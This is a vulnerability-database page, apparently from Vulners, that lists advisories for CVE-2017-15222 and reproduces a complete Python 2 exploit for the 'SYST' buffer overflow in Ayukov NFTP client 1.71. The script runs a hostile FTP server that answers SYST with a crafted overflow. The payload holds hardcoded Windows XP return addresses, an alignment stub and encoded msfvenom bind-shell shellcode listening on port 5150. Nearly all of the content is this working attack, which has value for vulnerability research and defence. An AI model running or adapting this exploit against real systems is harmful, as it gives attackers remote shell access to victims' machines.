Vulners
Lucene search
Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow
| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
 | Ayukov NFTP FTP Client < 2.0 - Buffer Overflow Exploit | 23 Oct 201700:00 | – | zdt |
| Ayukov NFTP FTP Client 2.0 - Buffer Overflow Exploit | 7 Jan 201800:00 | – | zdt |
| Ayukov NFTP FTP Client 2.0 - Buffer Overflow Exploit | 2 Jan 201900:00 | – | zdt |
| Ayukov NFTP client 1.71 - (SYST) Buffer Overflow Exploit | 4 Nov 201900:00 | – | zdt |
 | Ayukov NFTP FTP Client Stack Buffer Overflow Analysis | 24 Oct 201700:00 | – | attackerkb |
 | CVE-2017-15222 | 21 Oct 201700:00 | – | circl |
 | Ayukov NFTPD Buffer Overflow Vulnerability | 25 Oct 201700:00 | – | cnvd |
 | Ayukov NFTPD Buffer Overflow Remote Code Execution (CVE-2017-15222) | 7 Apr 202000:00 | – | checkpoint_advisories |
 | CVE-2017-15222 | 24 Oct 201717:00 | – | cve |
 | CVE-2017-15222 | 24 Oct 201717:00 | – | cvelist |
10
# Exploit Title: Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow
# Date: 2019-11-03
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: http://ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe
# Version: 1.71
# Tested on: Windows XP Pro SP0, SP1, SP2, SP3
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2017-15222
# Steps to reproduce:
# Run the server with the valid Windows version
# Connect the client to the malicious server
# bind shell on port 5150
#!/usr/bin/env python2
import os, sys, socket
NARGS = len(sys.argv)
# ntdll.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
# kernel32.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
# 7C923A95 FFD6 CALL ESI # Windows XP Pro SP3; ntdll.dll
# 7C927543 FFD6 CALL ESI # Windows XP Pro SP2; ntdll.dll
# 77E641C7 FFE6 JMP ESI # Windows XP Pro SP1; kernel32.dll
# 77E667F3 FFE6 JMP ESI # Windows XP Pro SP0: kernel32.dll
tourRETs = {
"XPProSP3": "\x95\x3A\x92\x7c",
"XPProSP2": "\x43\x75\x92\x7C",
"XPProSP1": "\xc7\x41\xe6\x77",
"XPProSP0": "\xf3\x67\xe6\x77"
}
if not NARGS > 1:
print("USAGE: %s version" % sys.argv[0])
print("[.] version must be in:")
for item in tourRETs:
print("\t%s" % item)
sys.exit(1)
# sploit = "A"*5000 # crash! in SYST cmd, 41414141 in EIP and EBP
# ESP and ESI both pointers to somewhere in the As
# If I increase the overflow string to 10000, the area ESP points to at crash
#, goes from 864 bytes of uninterrupted \x41's to roughly 4056 bytes.
# sploit = "A"*10000
# sploit = sys.argv[1] # $(`locate pattern_create.rb|head -n 1` 10000) # 46326846 in EIP
# `locate pattern_offset.rb |head -n 1` 46326846 10000 # 4116
sploit = "A"*4116
# Add the return address
try:
sploit += tourRETs[sys.argv[1]]
except KeyError, x:
print("[!] Version %s: not a valid version! Possibly bad capitalization" % str(x))
sys.exit(1)
sploit += ("\x90"*12) # original calcs based on RET*4... oops. realign.
# echo "ibase=16;obase=10;0247CED1 - 0247C834" |bc # 0x69D (1693); ESP-ESI
sploit += "\x90"*1693 # leaves 16 nops at jmp/call target before Cs
# badchars = "\x00\x0a\x0d"
# locate EIP and align ESP to a close future 4 and 16 byte boundary
NOTES = """\
$-37 > D9EE FLDZ
$-35 > D97424 F4 FSTENV (28-BYTE) PTR SS:[ESP-C]
$-31 > 59 POP ECX
$-30 > 80C1 09 ADD CL,9
$-2D > 80C1 04 ADD CL,4
$-2A > 80C1 2A ADD CL,2A
$-27 > 80C5 01 ADD CH,1
$-24 > 51 PUSH ECX
$-23 > 5C POP ESP
"""
sploit += "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xc1\x09\x80\xc1\x04" #13 bytes
sploit += "\x80\xc1\x2a\x80\xc5\x01\x51\x5c" # 8 bytes
sploit += "\x90" * 0x22 # ESP = EIP
sploit += "\x90" * 20 # sled for shikata_ga_nai unpack
# msfvenom -p windows/shell_bind_tcp LPORT=5150 EXITFUNC=process
# -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -i 1 -f c
sploit += (
"\xba\xd2\xe1\x61\xb1\xdb\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x53\x83\xeb\xfc\x31\x53\x0e\x03\x81\xef\x83\x44\xd9\x18\xc1"
"\xa7\x21\xd9\xa6\x2e\xc4\xe8\xe6\x55\x8d\x5b\xd7\x1e\xc3\x57"
"\x9c\x73\xf7\xec\xd0\x5b\xf8\x45\x5e\xba\x37\x55\xf3\xfe\x56"
"\xd5\x0e\xd3\xb8\xe4\xc0\x26\xb9\x21\x3c\xca\xeb\xfa\x4a\x79"
"\x1b\x8e\x07\x42\x90\xdc\x86\xc2\x45\x94\xa9\xe3\xd8\xae\xf3"
"\x23\xdb\x63\x88\x6d\xc3\x60\xb5\x24\x78\x52\x41\xb7\xa8\xaa"
"\xaa\x14\x95\x02\x59\x64\xd2\xa5\x82\x13\x2a\xd6\x3f\x24\xe9"
"\xa4\x9b\xa1\xe9\x0f\x6f\x11\xd5\xae\xbc\xc4\x9e\xbd\x09\x82"
"\xf8\xa1\x8c\x47\x73\xdd\x05\x66\x53\x57\x5d\x4d\x77\x33\x05"
"\xec\x2e\x99\xe8\x11\x30\x42\x54\xb4\x3b\x6f\x81\xc5\x66\xf8"
"\x66\xe4\x98\xf8\xe0\x7f\xeb\xca\xaf\x2b\x63\x67\x27\xf2\x74"
"\x88\x12\x42\xea\x77\x9d\xb3\x23\xbc\xc9\xe3\x5b\x15\x72\x68"
"\x9b\x9a\xa7\x05\x93\x3d\x18\x38\x5e\xfd\xc8\xfc\xf0\x96\x02"
"\xf3\x2f\x86\x2c\xd9\x58\x2f\xd1\xe2\x72\xae\x5c\x04\x10\xde"
"\x08\x9e\x8c\x1c\x6f\x17\x2b\x5e\x45\x0f\xdb\x17\x8f\x88\xe4"
"\xa7\x85\xbe\x72\x2c\xca\x7a\x63\x33\xc7\x2a\xf4\xa4\x9d\xba"
"\xb7\x55\xa1\x96\x2f\xf5\x30\x7d\xaf\x70\x29\x2a\xf8\xd5\x9f"
"\x23\x6c\xc8\x86\x9d\x92\x11\x5e\xe5\x16\xce\xa3\xe8\x97\x83"
"\x98\xce\x87\x5d\x20\x4b\xf3\x31\x77\x05\xad\xf7\x21\xe7\x07"
"\xae\x9e\xa1\xcf\x37\xed\x71\x89\x37\x38\x04\x75\x89\x95\x51"
"\x8a\x26\x72\x56\xf3\x5a\xe2\x99\x2e\xdf\x12\xd0\x72\x76\xbb"
"\xbd\xe7\xca\xa6\x3d\xd2\x09\xdf\xbd\xd6\xf1\x24\xdd\x93\xf4"
"\x61\x59\x48\x85\xfa\x0c\x6e\x3a\xfa\x04"
) # 355
sploit += "C" * (10000 - 4116 - 4 - 12 - 1693 - 13 - 8 - 0x22 - 355 - 20)
cases = {
"USER": "331 user OK. Pass required",
"PASS": "230 OK, current directory is /",
# "SYST": "215 UNIX Type: L8",
"SYST": sploit, # CRASH! in response to SYST cmd/request, w/"A"*5000, 41414141 in EIP and EBP
"TYPE": "200 TYPE is whatever was just requested... \"yeah, ok\"",
"SITE UMASK": "500 SITE UMASK is an unknown extension",
"CWD": "250 OK, current directory whatever you think it is",
"PORT": "200 PORT command successful",
"PASV": "227 Entering PASV mode",
"LIST": "150 Connecting to whatever port.\r\n226 ASCII\r\n226 Options: -a -l\r\n226 3 matches total"
}
sx = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sx.bind(("192.168.56.181",21))
sx.listen(5)
print("[.] Standing up HostileFTPd v0.0 alpha, port 21")
cx,addr = sx.accept()
print("[!] Connection received from %s" % str(addr))
cx.send("220 HostileFTPd v0.0 alpha !\r\n")
notified = 0
while True:
req = cx.recv(1024)
for key, resp in cases.items():
if key in req:
cx.send(resp + "\r\n")
if "SITE UMASK" in req and notified == 0:
print("[!] Buffer sent. Bind shell on client's port 5150?")
notified = 1
if "PASV" in req:
justpause = raw_input("[.] PASV received. Pausing recv buffer")
NOTES="""\
### followed TCP stream in normal client connect to ftp server
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 13:47. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
USER bozo
331 User bozo OK. Password required
PASS theclown
230-User bozo has group access to: 1003
230 OK. Current directory is /
SYST
215 UNIX Type: L8
TYPE I
200 TYPE is now 8-bit binary
SITE UMASK 022
500 SITE UMASK is an unknown extension
CWD /
250 OK. Current directory is /
PASV
227 Entering Passive Mode (192,168,56,181,183,29)
LIST -a
150 Accepted data connection
226-ASCII
226-Options: -a -l
226 3 matches total
"""Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Nov 2019 00:00Current
9.8High risk
Vulners AI Score9.8
CVSS 27.5
CVSS 3.19.8
EPSS0.81586